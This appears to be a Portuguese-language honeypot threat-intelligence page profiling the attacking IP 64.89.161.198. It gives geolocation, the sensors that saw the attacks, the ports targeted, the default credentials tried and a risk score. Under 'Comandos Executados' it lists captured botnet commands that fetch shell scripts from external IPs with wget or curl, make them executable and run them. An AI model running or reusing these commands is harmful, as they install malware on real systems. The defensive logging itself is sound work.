Ameaca AtivaCRITICO

64.89.161.198

Pais de Origem🇸🇬 Singapur
Primeira Deteccao02/02/2026
Ultima Atividade23/02/2026
ISPOVH SAS
🎯
180
Ataques Totais
🔌
25
Portas
📡
7
Tipos de Ataque
🦠
5
Malware

Geolocalizacao

Pais
🇸🇬 Singapur
Cidade
Desconhecida
ASN
AS16276
ISP
OVH SAS

Tipos de Ataque

h0neytr4p
cowrie
honeyaml
dionaea
tanner
honeytrap
ciscoasa

Portas Atacadas

2380814431443300030013002300330043005300630073010312833014000400540634444+5

Malware Associado

Credenciais Tentadas

🔐admin/admin
11x
🔐root/root
6x

Comandos Executados

$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp; rm -f cat.sh; rm -rf iran.*; wget http://188.214.30.5/r.sh -O r.sh; chmod 777 r.sh; ./r.sh2x
$echo SUCCESS2x
$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.128.118.140/run.sh; curl -O http://45.128.118.140/run.sh; chmod 777 run.sh; sh run.sh; rm -rf run.sh1x
$echo MAGIC_PAYLOAD_KILLER_HERE_OR_LEAVE_EMPTY_iranbot_was_here cd /tmp; rm -f cat.sh; rm -rf iran.*; wget http://188.214.30.5/r.sh -O r.sh; chmod 777 r.sh; ./r.sh telnet1x

Avaliacao de Risco

95
/100
BaixoMedioAltoCritico